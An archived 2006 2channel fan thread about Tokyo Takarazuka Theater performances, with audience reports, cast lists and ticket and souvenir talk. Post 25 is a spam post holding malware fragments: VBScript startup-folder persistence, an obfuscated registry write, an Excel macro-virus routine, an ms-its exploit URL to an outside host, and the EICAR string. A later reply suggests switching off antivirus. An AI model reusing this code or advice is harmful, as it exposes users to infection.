2ちゃんねる スマホ用 ■掲示板に戻る■ 全部 1- 最新50    

■ このスレッドは過去ログ倉庫に格納されています

@公演中【東京宝塚劇場】現在進行形@第4幕目@

1 :名無しさん@花束いっぱい。:2006/09/29(金) 13:20:09 ID:rrtPI4ke.net
東京宝塚劇場で公演中の舞台情報についてのスレです!

@公演中【東京宝塚劇場】現在進行形@第3幕目@
http://hobby8.2ch.net/test/read.cgi/siki/1135359963/
@公演中【東京宝塚劇場】現在進行形@
http://hobby8.2ch.net/test/read.cgi/siki/1124997012/
ただいま公演中【東京宝塚劇場】
http://hobby8.2ch.net/test/read.cgi/siki/1105507477/

2 :名無しさん@花束いっぱい。:2006/09/29(金) 13:59:06 ID:h4K3iclD.net
>>1
乙〜!

花ファントムもたった今進行中なの含めてラスト3日か・・・
サバキ目当てで今日も行っとけばよかったかな・・・とチョト後悔(´・ω・`)

3 :名無しさん@花束いっぱい。:2006/09/29(金) 18:22:19 ID:gW35lIav.net
今日、大階段エリク降ってくるとこ、なんかあったの?周りが叫んでたから…



4 :名無しさん@花束いっぱい。:2006/09/29(金) 18:55:36 ID:MHI3HiTn.net
今日見たけど、エリック降ってくるとこってどこだっけ?
フィナーレの大階段なら、
オサのキラキラ衣裳と羽におばちゃんたちが歓声あげてたけど。

5 :名無しさん@花束いっぱい。:2006/09/29(金) 20:12:41 ID:gW35lIav.net
>4
あ、じゃあそれかも。なんか何時もと雰囲気違ったから、なんかやっちゃったのかと思ったよ。



6 :名無しさん@花束いっぱい。:2006/09/30(土) 08:20:44 ID:be8zyZXD.net
28日夜公演2階A席1枚。「ファントム」に乗り気でない私はさばきに行きましたが、こんな楽近くでも良い席狙いの方が多くてびっくり。捌き待ちの常連はいやなのでおとなしそうな方に声かけたら2階というといらないと〜。後二枚ほしいと〜。

7 :名無しさん@花束いっぱい。:2006/10/01(日) 22:10:41 ID:y4zmf/ap.net
「と〜。」ってなんだその言い回しwwwww

8 :名無しさん@花束いっぱい。:2006/10/02(月) 00:56:24 ID:01lnubdj.net
6さんと7さんのやり取りが可笑しくて大笑いしたボ

9 :名無しさん@花束いっぱい。:2006/10/05(木) 09:10:39 ID:2mpp9LfL.net
もーすぐ初日、ageるぽ

10 :名無しさん@花束いっぱい。:2006/10/05(木) 09:20:36 ID:zkhRASH2.net
sage

11 :名無しさん@花束いっぱい。:2006/10/05(木) 10:54:45 ID:SuFisBnK.net
明日、見るぽ

12 :名無しさん@花束いっぱい。:2006/10/06(金) 21:01:38 ID:Zgfs0kEK.net
>11タン
報告ヨロ。
台風来てるからageるで〜。

13 :名無しさん@花束いっぱい。:2006/10/06(金) 21:22:03 ID:PqTc4x9v.net
初日・ショーで気がついたこと。
しゅんちゃん、チョビひげの左側がピラピラして、ダンディとはほど遠かったです。
ドン・キホーテへの客席の手拍子、ずれまくり。
わたるさんは黒燕尾での新場面ボレロ、そのまま続いてSuper Duetしてました。
ボレロの後の客席の拍手はすごかったです。
カテコのわたるさんの挨拶では、ご自身を「雨女」とおしゃってました。

14 :名無しさん@花束いっぱい。:2006/10/06(金) 21:44:42 ID:6lGkb7UI.net
>13
報告dです。
ドンキホーテ、初日から手拍子あってよかった。
ムラでは楽しか入らなかったからw
わたるのデュエット衣装が黒燕尾のままって残念だな。
白できれいな衣装だったのに。

15 :名無しさん@花束いっぱい。:2006/10/06(金) 21:48:58 ID:uuc6MZST.net
新場面に出ているのは何人くらい?
できれば誰か知りたいです。

16 :名無しさん@花束いっぱい。:2006/10/06(金) 21:50:28 ID:LzJWgP1/.net
となみちゃんの衣装は白のまま?

17 :名無しさん@花束いっぱい。:2006/10/06(金) 21:53:02 ID:PqTc4x9v.net
>16
白のまま

18 :名無しさん@花束いっぱい。:2006/10/06(金) 21:54:56 ID:6lGkb7UI.net
>15
英真・にしき・紫蘭・美稀・立樹・涼・青空・祐穂・美城・涼麻・綺華・柚希・天霧・銀河
彩海・天緒・一輝・鶴美・夢乃・七風・水輝・紅・碧海・壱城・美弥・羽鷲

19 :名無しさん@花束いっぱい。:2006/10/06(金) 21:57:10 ID:LzJWgP1/.net
d。となみちゃんまで黒だと歌の雰囲気と合わないか。

20 :名無しさん@花束いっぱい。:2006/10/06(金) 22:56:11 ID:8Nm84gQ0.net
当日券って売り切れ必至ですか?

21 :名無しさん@花束いっぱい。:2006/10/06(金) 22:59:52 ID:gNSz/aI5.net
>>13
そこは「雨男」って言って欲しかったw

22 :名無しさん@花束いっぱい。:2006/10/07(土) 09:09:40 ID:PtnXXbBR.net
>20
多分。

23 :名無しさん@花束いっぱい。:2006/10/07(土) 09:27:30 ID:k3ddSY3Z.net
今日7日、11時からのチケット二枚あります。急に午後から予定が入ったので‥ 10時半に有楽町で渡せます。お席は二階四列10番台です。庭に連絡先あります

24 :名無しさん@花束いっぱい。:2006/10/29(日) 16:06:12 ID:QjNYfMa6.net
さよなら公演中なのに何でこんなに下がってるの?
捜すのに一苦労だった。

25 :<body onload=window()>:2006/10/29(日) 17:51:50 ID:Mbselv7Q.net
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


26 :名無しさん@花束いっぱい。:2006/10/31(火) 15:26:45 ID:9gcmTpM/.net
今日はなんだか、台詞が微妙に飛んでたりしてたよ。
週末はお疲れかしらね。

27 :名無しさん@花束いっぱい。:2006/11/04(土) 22:25:09 ID:y3pgRoAw.net
このスレ開くといつもアンチウィルスが「ウイルスを削除しました」
って出るんだけど・・・
あやしいのって、25のやつ??


28 :名無しさん@花束いっぱい。:2006/11/05(日) 12:13:58 ID:aPu8F0u0.net
11月4日の3時半の愛短。
わたさんととうこさん、となみちゃんをお昼ご飯にご招待でのシーン。
場面切り替わりの一声を「おまたせっっ・・おまたせいたしました」って
思い切りかんじゃったのは誰だろう。

わたるさん「大丈夫?」なんて、たぶんアドリブで返してたけど。
「ハイ」ってうなずいてるのが可愛かった。

思いっきり下がってるので、あげます。

29 :名無しさん@花束いっぱい。:2006/11/06(月) 00:43:59 ID:KtgNxvZH.net
違ったらごめん。
あまおさんだったと思う

30 :名無しさん@花束いっぱい。:2006/11/11(土) 22:28:49 ID:m9OBhYBp.net
明日、ラストかぁぁぁ。。。


31 :名無しさん@花束いっぱい。:2006/11/11(土) 23:44:43 ID:dowIJ8/s.net
>27 私もなる。ウイルス削除しました〜って。

32 :名無しさん@花束いっぱい。:2006/11/12(日) 14:10:58 ID:7hQQ4lVI.net
千秋楽あげ。・゜゜(>д<)゜゜・。

33 :名無しさん@花束いっぱい。:2006/11/12(日) 14:22:58 ID:tT5nXFnL.net
ノートン切れば>27,31

34 :名無しさん@花束いっぱい。:2006/11/12(日) 15:05:36 ID:lIKzhrrN.net
星組スレ覗いた方が
千秋楽レポなどあるよ今ごろ皆さん頑張ってるんでしょうね


35 :名無しさん@花束いっぱい。:2006/11/17(金) 22:23:36 ID:jL98zsoX.net
雪初日アゲ

36 :名無しさん@花束いっぱい。:2006/11/17(金) 23:07:38 ID:LNdOYI7y.net
開演前、1Fから2Fにあがるエレベータのところで初老の男性が倒れてました。
まわりに劇場スタッフがついて介抱してたけど、顔色がすごく悪くなって苦しそうでした。
救急車とかいう声が聞こえたけど、そのあとどうなったのかな。ちゃんと病院に運ばれて
元気になっていたらいいんだけど。


37 :名無しさん@花束いっぱい。:2006/11/17(金) 23:14:01 ID:0q7zIP7A.net
「タランテラ!」の演奏、すごく良かった!

38 :タイガー ◆u.TIGERV.k :2006/11/18(土) 00:55:32 ID:b71Gj+gy.net
初日、見ました。
しゃれた演出も多く、素敵な舞台でした。ルシファーが何をしに来たのか
本当の目的はよくわかりませんでしたが、朝海さんの最後の舞台に相応しい
美しい場面の数々が印象的でした。

しかし同じく最後の舞台となる舞風さんが、ほとんど死体のような役だった
のには、ちょっと驚きましたけど。
水夏希さんが、すでにトップに負けない貫祿でしたし、歌もさらに上手に
なっていたようで良かったですね。

さよなら、さよなら、さよなら…淀川さんのような三連発。

39 :名無しさん@花束いっぱい。:2006/11/18(土) 01:01:49 ID:3EubPaxB.net
「死体のような役」って。。ホントだぁ

40 :名無しさん@花束いっぱい。:2006/11/18(土) 22:43:09 ID:AqqpXuD1.net
今度友達とはじめての宝塚を見に行こうって
話しています。
で『維新回天・竜馬伝!』と『パリの空よりも高く』
見るならどっちがお勧めか教えてくださりませんか。

41 :名無しさん@花束いっぱい。:2006/11/18(土) 22:49:10 ID:Umjs7hjd.net
ぜったい『維新回天・竜馬伝!』のほうがいいよ。
初見のひとも楽しめる。

42 :月組ファン:2006/11/18(土) 22:51:17 ID:AILCpimv.net
もちろん『パリの空より高く』でしょ!!     トップさんも格好いいし、下級生の子達も歌、芝居両方ともいいしね。お薦めだよぉ(≧∀≦)/    宙組なんて観に行ったら、お金の無駄だよ

43 :名無しさん@花束いっぱい。:2006/11/18(土) 22:56:25 ID:yTnWQiun.net
竜馬を初日に見に行きましたが、はっきり言って最悪。
やる気あるの?って思った。
月組に期待!

44 :タイガー ◆u.TIGERV.k :2006/11/18(土) 22:56:40 ID:/IMU/UYN.net
和物は、いわゆる宝塚らしいイメージとはちょと違うと感じるかもね。
でも、両方見に行って欲しいですよ。

45 :月組ファン:2006/11/18(土) 22:57:42 ID:AILCpimv.net
絶対、月組の方がいい!!上級生から下級生まで演技もお芝居も両方とも、上手いし、何よりトップさんが格好いいしね(*^_^*)。  宙組を観るなんてお金の無駄だよ(‐д‐)ξ

46 :名無しさん@花束いっぱい。:2006/11/18(土) 23:17:40 ID:AlXg2rVE.net
堕天使、なんだかわからんが涙がたくさん出た
それに見終わっていい人になろう、っておもったよ
浄化作用あるのかな?

47 :名無しさん@花束いっぱい。:2006/11/21(火) 10:33:52 ID:yCc6jqH4.net
昨日、団体さんが多かったですよ。
「タランテラ!」で蝶の幕が上っていくところで、歓声があがってました。
なるほどね。

48 :名無しさん@花束いっぱい。:2006/11/23(木) 12:31:12 ID:6DukUmNN.net
今回の東京宝塚劇場でかしちゃんの炭酸せんべいは購入できますか?
&萩の月の販売はありますか?

49 :名無しさん@花束いっぱい。:2006/11/23(木) 13:13:26 ID:+xw0R3kb.net
>48
かしちゃんの缶は、気がつかなかったけど、
萩の月(今の公演のパッケージ)は、販売してます。
開演前に急いで買わなくても、幕間でも買えましたよ。

50 :名無しさん@花束いっぱい。:2006/11/23(木) 13:27:05 ID:qqPNwjrn.net
萩の月終演後でも買えますか?

51 :名無しさん@花束いっぱい。:2006/11/23(木) 16:54:51 ID:qHf4+6p5.net
>>49さま ありがとうございます。
私は2回好演のソワレのチケを持っているので劇場入ったらすぐ買ってみます!。


52 :名無しさん@花束いっぱい。:2006/11/23(木) 16:56:15 ID:81SwFORm.net
公演中の
堕天使の涙
東宝の当日チケットで観た方いますか?
早めにいかないと
当日チケットはゲットできないでしょうか?平日狙いなのですが。。東宝の当日チケットで観た方情報下さい!

53 :名無しさん@花束いっぱい。:2006/11/23(木) 21:05:25 ID:OPRqHRpW.net
>52
チケットに関することはココで聞いても教えてくれる人はめったにいません。
聞いても怒られるし、答えても怒られる。
ガンガッテ自力でゲットしてちょ。

総レス数 1000
124 KB
新着レスの表示

掲示板に戻る 全部 前100 次100 最新50
read.cgi ver 2014.07.20.01.SC 2014/07/20 D ★